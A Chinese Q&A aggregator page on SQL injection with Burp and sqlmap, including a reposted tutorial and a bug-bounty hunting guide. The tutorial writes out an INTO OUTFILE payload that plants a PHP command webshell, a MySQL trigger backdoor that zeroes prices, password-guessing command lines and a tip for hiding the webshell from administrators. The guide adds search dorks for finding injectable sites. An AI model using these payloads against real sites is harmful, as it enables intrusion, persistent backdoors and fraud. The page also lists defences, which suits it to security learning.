當前位置:首頁 » 編程語言 » burpsql注入
擴展閱讀
webinf下怎麼引入js 2023-08-31 21:54:13
堡壘機怎麼打開web 2023-08-31 21:54:11

burpsql注入

發布時間: 2023-05-24 15:42:26

『壹』 關於sql注入。

我還沒進公司時,網站平均15天被注入一次,我進公司以後,大力整改,至今3個月,未見被注入。
我告訴你我的方法。
總結起來就是:關鍵詞屏蔽或替換 + 參數法sql。
1.封裝一個類,用來將傳入的參數進行關鍵詞的屏蔽和替換(像ID之類的參數,可以屏蔽關鍵詞的就完全屏蔽,像textarea這樣不能完全屏蔽的,就把關鍵詞替換,如將半形的'替換成全形』。還要限制參數的字數(很重要)
2.將所有需要和資料庫打交道的地方全部進行參數化sql。
如將sql="select * from table where id='"+value+"'"
改sql="select * from table where id=@id"
寫一個類,裡面專門存放參數法sql的各種方法,雖然會麻煩一些,但是非常非常有效,可以杜絕絕大多數sql注入。
這樣,雙管其下,基本可以防止sql注入了

『貳』 sqlmap掃描到的sql注入,怎樣解決

1、首先是burp設置記錄log 2、把記錄的log文件放sqlmap目錄下 3、sqlmap讀log自動測試: python sqlmap.py -l 文件名 --batch -smart batch:自動選yes。 smart:啟發式快速判斷,節約時間。 4、最後能注入的url會保存到out文件夾下。

『叄』 如何利用SQL注入製造一個後門

如何利用SQL注入製造一個後門

0×01,介紹…

0×02,什麼是Sql Injection..

0×03,一個系統後門(OS)Backdoor.

0×04,獲得一個OS Shell

0×05,一個資料庫後門(Database backdoor).

0×07,推薦的防禦措施…

0×08,結論…

0×09,參考…

0×01,介紹
如果你正在讀這篇文章那麼我有理由相信你曾經聽說過一種病毒,或者是它一種特洛伊木馬或者蠕蟲,這類惡意程序可以感染你的計算機系統。一旦你的計算機系統被感染,那麼當你使被感染的計算機連接到互聯網,它很可能會去感染其他的計算機。許多時候,惡意軟體不僅僅只是從一台計算機傳播到另一台,他們會針對每一台感染的計算機進行自身的變異。這些變化將會讓病毒遠程的控制每一台計算機並使它們在之後感染更多的計算機系統。這些病毒第一次執行時會復制一個小型的可執行文件到用戶的磁碟上,這個可執行文件僅僅會監聽在當前計算機系統未使用的埠上從而惡意軟體可以在被感染主機連入互聯網的任意時刻訪問這台主機。這個小的可執行文件叫做後門(Backdoor)。我在這里已經簡要的說明了後門的概念。

0×02,什麼是Sql Injection
已經有超過1百萬的文章講述了什麼是Sql注入並且怎樣去發現和怎樣去避免這類威脅,所以我不想再次重復。如果你需要了解一些關於Sql注入的背景知識,這里有一個介紹性文章的連接可以供你閱讀。這篇文章末尾我也提供了一些參考資料可以讓你針對這篇文章所討論的話題獲得更多的知識信息。

0×03,一個系統後門(OS)Backdoor
這篇文章的目的是利用Sql Injection執行各種各樣的命令最終控制操作系統。為了運行系統命令,我們需要一個CMD shell,或者需要執行一些代碼使得我們可以執行OS命令。讓我們分別嘗試一下這兩種方法。

0×04,獲得一個OS Shell
現在我們將寫我們自己的代碼使之可以讓我們運行任意OS命令來控制操作系統。所以,從之前的文章中我們已經知道搜索部分的變數存在Sql Injection並且在question表中存在4個列名。作為提示,語句Harry Potter』 union select 1,2,3,4#將會出現錯誤:

現在,我們想插入可以執行系統命令的PHP代碼。為了實現這個目的,我們使用MYsql提供的INTO OUTFILE特性。使用Using INTO OUTFILE,可以將查詢的輸出重定向到系統的文件中去。真因為如此,我們可以執行Harry Potter』 union select 『TEXT INTO FILE』,2,3 INTO OUTFILE 『/tmp/blah.txt』#,然後字元串『TEXT INTO FILE』將會被存儲在目錄/tmp下的blah.txt中。如圖:

現在我們將 『TEXT INTO FILE』替換成基本的PHP代碼使之可以讀取URL的參數來執行系統命令控制操作系統。我們使用這樣的語句: Harry Potter』 union select 「<?system($_REQUEST['cmd']); ?>」,2,3 INTO OUTFILE 『/var/www/test/execcmd.php』# ,如圖:

就是這樣!但是還出現了很多我們根本不關心的書籍的內容。所以我調整了我的查詢語句為:

『 union select 「<? system($_REQUEST['cmd']); ?>」,2,3 INTO OUTFILE 『/var/www/test/execcmd.php』#並再次執行。

盡管這回還是返回了2和3,但是好多了。

現在我們訪問execcmd.php並把命令[cat /etc.passwd]傳遞給我們想提交執行的參數。

成功了。通過我多次的嘗試,這里有幾點需要注意的事情。

–運行這條語句的資料庫用戶需要擁有FILE許可權,否則不能執行INTO OUTFILE命令。

–在MySQL服務運行的主機中必須存在一個可寫的Web目錄,否則你不能訪問你剛剛上傳的Webshell。你可以將代碼寫入到總是可寫的目錄像/ttmp,但是你沒有許可權訪問它。

一種簡單的方式來實現OS Shell是使用SQLMap內置的特性。如果你讀過我之前的文章,你會記得我使用過SQLMap。讓我們通過SQLMap來完成同樣的事情。

下面的OS shell截圖是在使用SQLMap進行注入時加入了一個簡單的參數並且在提示處選擇了PHP Web Shell而獲得的。

運行一個命令來檢查我們是否已經獲得了一個Shell。OK,沒問題。

這實在是太容易了。

不幸的是,從『破壞者』的角度來看這也同樣是簡單的。

現在有了這么簡單快捷的方法你肯定不想再用之前的方法了,但是知道手動利用的方法總是有幫助的(這樣當使用工具失敗時你可以有另外的方法)。還有一件事需要注意,難獲得了一

個WebShell時,請使用一個和Web目錄中已經存在的文件十分相似的名字去命名。這會幫助你隱藏你的WebShell使之不會被管理員不經意間輕易的發現。

在開始下一類Backdoor之前,我將向你展示隱藏SQLMap的方法。你可以通過設置代理來運行SQLMap。

然後當SQLMap將實際的WebShell上傳到可寫目錄的時候,brupSuite會攔截到一些請求,讓我們看一下這些請求。

我們能看到一些熟悉的東西。讓我們通過URL decode來確定一下。看一下在底部面板的藍色高亮的部分。它顯示出SQLMap正在使用INTO OUTFILE命令,和我們之前人工使用的方法是一樣的。

最後,我們看一下SQLMap上傳WebShell的內容,非常有意思,看一下底部的面板。

這就是關鍵,工具再一次的大大簡化了我們本該花費大量時間進行的繁瑣工作。

0×05,一個資料庫後門(Database backdoor)
現在我們知道一個OS後門可以在Web應用存在SQL Injection時被植入到系統中。現在讓我們看看如何在資料庫中植入一個後門吧。在我們繼續之前,我們需要一些了解一下backdoor function的相關知識。在OS backdoor中,我們直接訪問了後門並且傳遞給它了一個命令;但在這里卻並不會那麼直接。當我們每一個插入的操作執行時,我們配置的後門會改變資料庫中一些敏感數據的值。所以,每一本書在添加到資料庫中時價格會被我們的後門設置成0,以至於人們可以免費「購買」這些書籍。這在真實的環境中可能會很快被發現。

所以我們在資料庫中有一些叫做「觸發器」的東西,基本的意思就是——「當某些我們希望發生的事情發生時,觸動觸發器去做另外一些事情」。這描述的確實太模糊了,然我們舉一個更明顯的例子。假如你是一個警察,某一時刻你看到一個連環殺手,你扣動扳機並且發射出一枚子彈對么?那麼把他轉換為我們之前的場景——有一個INSERT語句(殺手),一個Database trigger(槍手)開火了,那麼動作(action)就是釋放你之前已經配置(configured)好的子彈(bullet)。

下面使我們要寫的一個MySQL觸發器的例子:

delimiter #

CREATE TRIGGER price BEFORE INSERT ON books

for each row begin

set new.price=』0′;

end;#

delimiter ;
b)無論任何時候如果我們執行一個Insert語句,比如假如一本書,那麼我們設置其價格為0.下面是它的意思:

a)設置默認的MySQL分隔符為』#',因為默認的分隔符是』;'在MySQL作為特殊字元處理了,而我們需要將其作為數據處理。所以我們改變分隔符為』#',表示』#'現在有一個特殊的含義。

c)終止觸發器並將分隔符重置為』;'。

然我們使用Sql Injection將觸發器復制到伺服器上。下面是要作為搜索框輸入的語句:

Harry Potter』 AND 1=0 union select 0×20,0×20,0×20 INTO OUTFILE 『/var/www/test/g2′ LINES TERMINATED BY 6d69746572203b#

我會快速解釋一下這個查詢語句—因為即使看起來它很復雜—其實不然。我們使用1=0因為我們對關於《Harry Potter》的查詢結果並不感興趣。0×20的位置只是查詢了三次空格』space』;這是為了我可以僅僅得到想要重定向到文件』/var/www/test.g2′中的內容。然後LINES TERMINATED BY後面的部分是整個觸發器使用hex函數轉換後的形式(我是用的是Brup Decoder,不要坐在那兒浪費時間去手工轉化它)。

讓我們運行一下看看會在文件/var/www/test/g2中出現什麼。

你注意到了最開始的幾個空格了么?這就是我們之前看到的select 0×20,0×20,0×20的作用。之後的內容就顯而易見了。

現在我們以某種方式執行這個查詢然後我們的觸發器會在每次一本書被插入時激活,這里有三種實現的方法。

a)多語句查詢(Stacked Queries)—Harry Potter』 UNION blah blah blah;source /var/www/test/g2但是這事實上不會成功執行,因為PHP+MySQL不支持多語句查詢。

b)濫用MySQL默認觸發器行為(Abusing MySQL default trigger behavior)—這種方法我還沒有測試過,不過在Stefano Di Paola的文章中被描述的非常清楚。嘗試一下吧,我找時間也會測試一下。

c)使用SQL Injection工具比如SQLMap運行我們存放在/var/www/test/g2中保存的觸發器。這是我們將要測試的方法。

我們來再次運行SQLMap並獲得一個我們可以運行觸發器的SQL shell。

看最後一行。不幸的是,只有當支持多語句查詢時,這種方法才可以執行。這意味著上面的選項a,c意味著同一種情況。讓我們通過代理來查看SQLMap的請求。

讓我們在Sql-shell中執行一個簡單的創建新資料庫的語句—」create database boo;」並在Brup中查看。

我們可以看到,SQLMap嘗試將它轉換為一個SELECT查詢。這將永遠不會執行成功。從Burp相應的內容證實了這一點。

我能想到的唯一一種能夠順序執行我們的查詢的可行辦法包含以下幾個步驟:

—猜解一個有效MySQL用戶的密碼。例如,你猜到root的密碼是test123

—注入一個OS webshell後門。

—注入一個類似之前格式的觸發器。

—現在通過在Webshell中運行MySQL命令來安裝觸發器。

我有幾張截圖來說明為什麼這樣是可行的。為了照顧初學者,這里有張截圖表名當前不存在任何觸發器。

假設我們已經猜解到了用戶名和密碼root和toor(通過Blind SQL暴力猜解mysql.user表)。現在我們反問Web shell並傳遞一個命令:

mysql -u<USERNAME> -p<PASSWORD> <DB NAME> < /var/www/test/g2

現在我們再來看一下資料庫。

看到了我們的觸發器。

現在我們來運行一個INSERT查詢來檢查我們的觸發器是否會運行。然後所有Jeffrey Archer的書的價格會變得非常不可思議。

現在執行查詢:

看最後一行。某些人可以不用支付他本認為應該支付的價格了。

現在我們直接執行一個INSERT查詢來控制資料庫。在真實環境中將會有一個表單來添加書籍,在後端很可能會有一個INSERT查詢,這時觸發器很有可能被觸發執行。這是我沒有創建另外一個表單的唯一原因。

明顯地,一個大前提是我們能夠猜解資料庫的用戶名和密碼。下面有一個簡單的思路可以讓你實現這個目的。

—想一些常用的資料庫用戶名(比如MySQL的root)或者通過社會工程學獲得一些。

—MySQL密碼是通過哈希加密的,並不是明文。

你可以通過以下兩種方式破解密碼:

—通過SQL Injection將密碼的Hash與密碼明文列表對比。(參考我之前的文章)

—在WebShell中通過密碼明文列表和一個特定的用戶名來運行觸發器。你可以寫一個Perl或者Ruby腳本來為你做這些事情。嘗試在遍歷完明文密碼列表之後插入一本書,或者在每次猜解後找出那個密碼是正確的。

mysql -uroot -ptoor blindsql_test< /var/www/test/g2

mysql -uroot -proot blindsql_test< /var/www/test/g2

mysql -uroot -ptest blindsql_test< /var/www/test/g2

mysql -uroot -ppassword blindsql_test< /var/www/test/g2

0×07,推薦的防禦措施
a)使用參數化查詢來防禦SQL注入攻擊。

b)不要在Web目錄中存在大量可寫目錄。

c)限制Web應用在後端查詢資料庫的用戶的許可權。為了實現這一點,不要給其分配FILE許可權。

d)設置復雜的資料庫密碼和健壯的密碼策略。

0×08,結論
這個問題的根源,是Web應用存在Sql注入弱點。修復它將會阻止這種威脅的發生。然而,知道不同的植入後門的方法還是有益的。許多惡意軟體將會通過這種方式傳播;也需要採取措施來防止它們。

出自:http://www.freebuf.com/articles/222.html

『肆』 brup suite 檢測哪些web漏洞

網路發展至今,他的高端我們都見識過,但是網路安全也是一直以來不變的話題,怎樣能使網路更加安全呢?如何構建一個安全的Web環境,是應該考慮的事情。該選擇哪些安全工具呢?我們可以再危險發生之前,先測試一下自己系統中的漏洞。為大家推薦10大Web漏洞掃描程序。 1. Nikto 這是一個開源的Web伺服器掃描程序,它可以對Web伺服器的多種項目進行全面的測試。其掃描項目和插件經常更新並且可以自動更新。Nikto可以在盡可能短的周期內測試你的Web伺服器,這在其日誌文件中相當明顯。不過,如果你想試驗一下,它也可以支持 LibWhisker的反IDS方法。不過,並非每一次檢查都可以找出一個安全問題,雖然多數情況下是這樣的。有一些項目是僅提供信息類型的檢查,這種檢查可以查找一些並不存在安全漏洞的項目,不過Web管理員或安全工程師們並不知道。 2. Paros proxy 這是一個對Web應用程序的漏洞進行評估的代理程序,即一個基於Java的web代理程序,可以評估Web應用程序的漏洞。它支持動態地編輯/查看 HTTP/HTTPS,從而改變cookies和表單欄位等項目。它包括一個Web通信記錄程序,Web圈套程序,hash 計算器,還有一個可以測試常見的Web應用程序攻擊的掃描器。 3. WebScarab: 它可以分析使用HTTP和HTTPS協議進行通信的應用程序,WebScarab可以用最簡單地形式記錄它觀察的會話,並允許操作人員以各種方式觀查會話。如果你需要觀察一個基於HTTP(S)應用程序的運行狀態,那麼WebScarabi就可以滿足你這種需要。不管是幫助開發人員調試其它方面的難題,還是允許安全專業人員識別漏洞,它都是一款不錯的工具。 4. WebInspect: 這是一款強大的Web應用程序掃描程序。SPI Dynamics的這款應用程序安全評估工具有助於確認Web應用中已知的和未知的漏洞。它還可以檢查一個Web伺服器是否正確配置,並會嘗試一些常見的 Web攻擊,如參數注入、跨站腳本、目錄遍歷攻擊等等。 5. Whisker/libwhisker : Libwhisker是一個Perla模塊,適合於HTTP測試。它可以針對許多已知的安全漏洞,測試HTTP伺服器,特別是檢測危險CGI的存在。 Whisker是一個使用libwhisker的掃描程序。 6. Burpsuite: 這是一個可以用於攻擊Web應用程序的集成平台。Burp套件允許一個攻擊者將人工的和自動的技術結合起來,以列舉、分析、攻擊Web應用程序,或利用這些程序的漏洞。各種各樣的burp工具協同工作,共享信息,並允許將一種工具發現的漏洞形成另外一種工具的基礎。 7. Wikto: 可以說這是一個Web伺服器評估工具,它可以檢查Web伺服器中的漏洞,並提供與Nikto一樣的很多功能,但增加了許多有趣的功能部分,如後端 miner和緊密的Google集成。它為MS.NET環境編寫,但用戶需要注冊才能下載其二進制文件和源代碼。 8. Acunetix Web Vulnerability Scanner : 這是一款商業級的Web漏洞掃描程序,它可以檢查Web應用程序中的漏洞,如SQL注入、跨站腳本攻擊、身份驗證頁上的弱口令長度等。它擁有一個操作方便的圖形用戶界面,並且能夠創建專業級的Web站點安全審核報告。 9. Watchfire AppScan: 這也是一款商業類的Web漏洞掃描程序。AppScan在應用程序的整個開發周期都提供安全測試,從而測試簡化了部件測試和開發早期的安全保證。它可以掃描許多常見的漏洞,如跨站腳本攻擊、HTTP響應拆分漏洞、參數篡改、隱式欄位處理、後門/調試選項、緩沖區溢出等等。 10. N-Stealth: N-Stealth是一款商業級的Web伺服器安全掃描程序。它比一些免費的Web掃描程序,如Whisker/libwhisker、 Nikto等的升級頻率更高。還要注意,實際上所有通用的VA工具,如Nessus, ISS Internet Scanner, Retina, SAINT, Sara等都包含Web 掃描部件。N-Stealth主要為Windows平台提供掃描,但並不提供源代碼。

『伍』 sqlmap怎麼注入sql server

當給sqlmap這么一個url的時候,它會:
1、判斷可注入的參數
2、判斷可以用那種SQL注入技術來注入
3、識別出哪種資料庫
4、根據用戶選擇,讀取哪些數據
sqlmap支持五種不同的注入模式:
1、基於布爾的盲注,即可以根據返回頁面判斷條件真假的注入。
2、基於時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。
3、基於報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中。
4、聯合查詢注入,可以使用union的情況下的注入。
5、堆查詢注入,可以同時執行多條語句的執行時的注入。
sqlmap支持的資料庫有:
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB
可以提供一個簡單的URL,Burp或WebScarab請求日誌文件,文本文檔中的完整http請求或者Google的搜索,匹配出結果頁面,也可以自己定義一個正則來判斷那個地址去測試。
測試GET參數,POST參數,HTTP Cookie參數,HTTP User-Agent頭和HTTP Referer頭來確認是否有SQL注入,它也可以指定用逗號分隔的列表的具體參數來測試。

『陸』 一個完整挖洞/src漏洞實戰流程【滲透測試】

只要搞滲透,不就會聽到很多行業內人前輩一直在重復:「信息搜集」 信息搜集有多重要,你搜集的到的多少資產信息,決定了你後續進行的一系列實戰到什麼程度!

要說SQL注入的漏洞咋找,邏輯漏洞咋找,支付漏洞咋找,越權漏洞咋找,等等

實這都一個道理,用谷歌語法,找通殺用fofa,這里演示幾個類型的漏洞,其它的也是一個道理。

第一個: SQL注入漏洞
AS:首先是SQL注入的,這個漏洞說實話,基本就是谷歌語法找的快,

語法: inurl:asp?id=23公司,這時候你會問:不是inurl:asp?id= 就行了嗎,當然!

這可以!如果你想找到一些奇奇怪怪的站可以用這個,比如:

這時候明白接公司的重要性了吧,這里找的是asp的站,為啥找asp的站?

其中一一個最重要的原因就是因為他,好挖!

當然這里只是找了一小部分站點的, 如果突然發現重復了咋辦?

這個簡單,換個id就行了同學!

inurl:asp?id-34公司,這里的id 值不斷的變變變就行了,你們也可以對比一下

這是不是就不一樣了,當然如果有興趣的話,也可以搜搜inurl :php?id=12公司

這也是可以找到很多站的,不過加WAF的幾率很大

我找了10個9個都加過,所以說要想上分上的快,asp 的站絕對不能落下!

這里我就不多敘述,因為這站好找,真的特別好找,但是要想能弱密碼進去的卻很少

直接上鏡像站一放inurl:什麼牛鬼蛇神都出來了,這後台管理的站可以說是非常多了

當然如果不想找到國外其它奇奇怪怪的站點的話,建議加個關鍵詞公司

可以看到這里一堆後台,當然要滲透這些後台弱密碼很少能進去了

你看到我打inur1: 它自動給我補齊關鍵詞了嗎,說明這玩意很多人挖

一般搞後台,先信息收集,這個等會說,反正我是沒搞到過幾個

這種漏洞咋找?商城,積分商城。
試試谷歌語法: info:商城AND積分商城

這不全是商城嗎,當然對於一些大廠, 建議不要去搞

因為防護也會比一般的站點比較嚴格,況且現在做在線網上商城的站點也很少了

其實可以在漏洞挖掘的時候注意一下站點是否有paypal這個功能,有的話,可以搞一搞的,這還是有搞頭的

再來就是邏輯漏洞,比如說平行,垂直越權,任意密碼重置啊什麼的。這類漏洞還是很多的,大家也可以去慢慢測的!

最後一個,通殺的漏洞咋找?

這時候就是要靠我們萬能的fofaQ了,首先我們要知道有哪些cms有漏洞

這里大家可以去找網上的漏洞庫,裡面- -般都會有漏洞合集和這里我稍後會給大家推薦一兩個

看到沒有,就是這么多cms,殺一個准,上分必備漏洞

不過有些重復提交了,可以給你們看看學員們的戰果!

當然,重復了幾個,但還是相當不錯了。

看完開頭,相信你已經知道怎麼找漏洞了,那我們就說說漏洞如何挖掘,這里分事件型和通用型漏洞

首先來的,肯定是我們的sq1注入了,首先使用我們的通用語法inurl:asp?id=xx 公司

直接點進去,不要害怕,只要不違法,咱不幹壞事就行

看到報錯了,說明啥,說明可能存在注入啊朋友,直接and 1=1 |and 1=2插進去

經過一番尋找,我們來到了這個網站:

看到網站直接插單引號,看他報不報錯

看到效果十分明顯,這種情況直接丟sqlmap9 ,反正我是丟的sqlmap , 大家如果時間充足的話可以上手

下一個站,這個站存在的漏洞是任意密碼重置和CSRF漏洞
首先是CSRF漏洞,相信不用我說你們也應該會了,這里就是這點出現漏洞

你們可以自己去測測,這里說我主要說的是任意密碼重置漏洞
(這個漏洞現在也已經被修復了)

在這一步的時候, 抓個包

這里再改成自己的郵箱,這樣自己的郵箱就能接收到驗證鏈接,直接點擊就好

看到這里,支付漏洞 和驗證碼繞過之類的邏輯漏洞是不是感覺+分的好挖,有沒有這種感覺!

這里類型比較多,篇幅太長不好閱讀。舉例這兩種做參考~

三、提交報告
例如.com發現了SQL注入
第一步:「標題」和「廠商信息」和「所屬域名」
站長工具icp.chinaz.com/.co...
查詢域名備案信息,看到這個公司名了嗎

這樣寫
漏洞類別啥的,如果不是0day的話,像圖中一樣就行了

所屬域名要寫該公司的「網站首頁」或者「官網」
看到這個了嗎

漏洞類型: -般都是Web漏洞,然後漏洞是什麼寫什麼,這里是一個SQL注入。

漏洞等級: SQL注入-般都是高危,但如果廠商比較小的話,會降級,降成中危。

漏洞簡述:描述一下SQL注入是什麼、 有什麼危害之類的。

漏洞url:出現漏洞的URL。

影響參數:哪個參數可以注入就寫哪個

漏洞POC請求包: Burp抓個包復制粘貼。

如果你嫌每次打字麻煩,可以新建一個記事本, 把框架寫好,提交的時候替換一些內容就可以了。

把標題、漏洞簡述、復現步驟、修復方案,把標題、漏洞簡述、復現步驟、修復方案,可以省不少時間!

今天的內容雖然偏長,但是都是干貨呀!從找漏洞到提交直接一步到位! 安排的明明白白!

注:任何未經授權的滲透都是違法行為,咱們挖SRC,擔心會違法,記住一點, 點到為止,不要動裡面的數據,發現漏洞之後,盡快提交漏洞,聯系廠商進行修復。